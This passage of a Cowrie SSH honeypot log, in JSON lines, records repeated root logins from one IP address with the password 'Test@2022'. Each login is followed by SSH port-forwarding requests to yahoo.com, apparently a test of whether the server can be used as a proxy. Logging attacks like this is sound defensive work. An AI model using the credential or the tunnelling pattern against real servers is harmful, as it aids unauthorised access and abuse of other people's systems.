-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.111279Z","src_ip":"213.209.150.239","session":"ca4111dd7468"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.346033Z","src_ip":"213.209.150.239","session":"ca4111dd7468"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":31172,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31172","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.394028Z","session":"ca4111dd7468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.441165Z","src_ip":"213.209.150.239","session":"ca4111dd7468"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":30675,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30675","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.577566Z","session":"ca4111dd7468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.624804Z","src_ip":"213.209.150.239","session":"ca4111dd7468"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.676117Z","src_ip":"213.209.150.239","session":"ca4111dd7468"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59562,"dst_ip":"1.2.3.4","dst_port":22,"session":"93af4d74b08f","protocol":"ssh","message":"New connection: 213.209.150.239:59562 (1.2.3.4:22) [session: 93af4d74b08f]","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.730276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.731297Z","src_ip":"213.209.150.239","session":"93af4d74b08f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.788086Z","src_ip":"213.209.150.239","session":"93af4d74b08f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.071022Z","src_ip":"213.209.150.239","session":"93af4d74b08f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20905,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20905","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.128675Z","session":"93af4d74b08f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.185425Z","src_ip":"213.209.150.239","session":"93af4d74b08f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27775,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27775","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.343001Z","session":"93af4d74b08f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.399652Z","src_ip":"213.209.150.239","session":"93af4d74b08f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.456887Z","src_ip":"213.209.150.239","session":"93af4d74b08f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59611,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed691b0c3068","protocol":"ssh","message":"New connection: 213.209.150.239:59611 (1.2.3.4:22) [session: ed691b0c3068]","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.503042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.503927Z","src_ip":"213.209.150.239","session":"ed691b0c3068"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.550931Z","src_ip":"213.209.150.239","session":"ed691b0c3068"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.785617Z","src_ip":"213.209.150.239","session":"ed691b0c3068"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29511,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29511","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.834202Z","session":"ed691b0c3068"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:15.882159Z","src_ip":"213.209.150.239","session":"ed691b0c3068"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":1039,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1039","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.017512Z","session":"ed691b0c3068"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.064749Z","src_ip":"213.209.150.239","session":"ed691b0c3068"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.112684Z","src_ip":"213.209.150.239","session":"ed691b0c3068"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59660,"dst_ip":"1.2.3.4","dst_port":22,"session":"d80dfc2a2c18","protocol":"ssh","message":"New connection: 213.209.150.239:59660 (1.2.3.4:22) [session: d80dfc2a2c18]","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.168557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.169474Z","src_ip":"213.209.150.239","session":"d80dfc2a2c18"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.226054Z","src_ip":"213.209.150.239","session":"d80dfc2a2c18"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.508353Z","src_ip":"213.209.150.239","session":"d80dfc2a2c18"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17824,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17824","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.565845Z","session":"d80dfc2a2c18"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.622436Z","src_ip":"213.209.150.239","session":"d80dfc2a2c18"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3780,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3780","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.778897Z","session":"d80dfc2a2c18"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.835684Z","src_ip":"213.209.150.239","session":"d80dfc2a2c18"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.893350Z","src_ip":"213.209.150.239","session":"d80dfc2a2c18"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59719,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0c5ef136905","protocol":"ssh","message":"New connection: 213.209.150.239:59719 (1.2.3.4:22) [session: f0c5ef136905]","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.939463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.949384Z","src_ip":"213.209.150.239","session":"f0c5ef136905"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:16.987280Z","src_ip":"213.209.150.239","session":"f0c5ef136905"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.222266Z","src_ip":"213.209.150.239","session":"f0c5ef136905"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21793,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21793","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.270506Z","session":"f0c5ef136905"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.317999Z","src_ip":"213.209.150.239","session":"f0c5ef136905"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":1930,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1930","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.453498Z","session":"f0c5ef136905"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.500772Z","src_ip":"213.209.150.239","session":"f0c5ef136905"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.549276Z","src_ip":"213.209.150.239","session":"f0c5ef136905"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59764,"dst_ip":"1.2.3.4","dst_port":22,"session":"562b8c0c08a5","protocol":"ssh","message":"New connection: 213.209.150.239:59764 (1.2.3.4:22) [session: 562b8c0c08a5]","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.605069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.606101Z","src_ip":"213.209.150.239","session":"562b8c0c08a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.662790Z","src_ip":"213.209.150.239","session":"562b8c0c08a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:17.944897Z","src_ip":"213.209.150.239","session":"562b8c0c08a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22578,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22578","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.002747Z","session":"562b8c0c08a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.059995Z","src_ip":"213.209.150.239","session":"562b8c0c08a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23850,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23850","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.215042Z","session":"562b8c0c08a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.271782Z","src_ip":"213.209.150.239","session":"562b8c0c08a5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.329241Z","src_ip":"213.209.150.239","session":"562b8c0c08a5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59827,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e66db4e61a3","protocol":"ssh","message":"New connection: 213.209.150.239:59827 (1.2.3.4:22) [session: 6e66db4e61a3]","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.375356Z"}
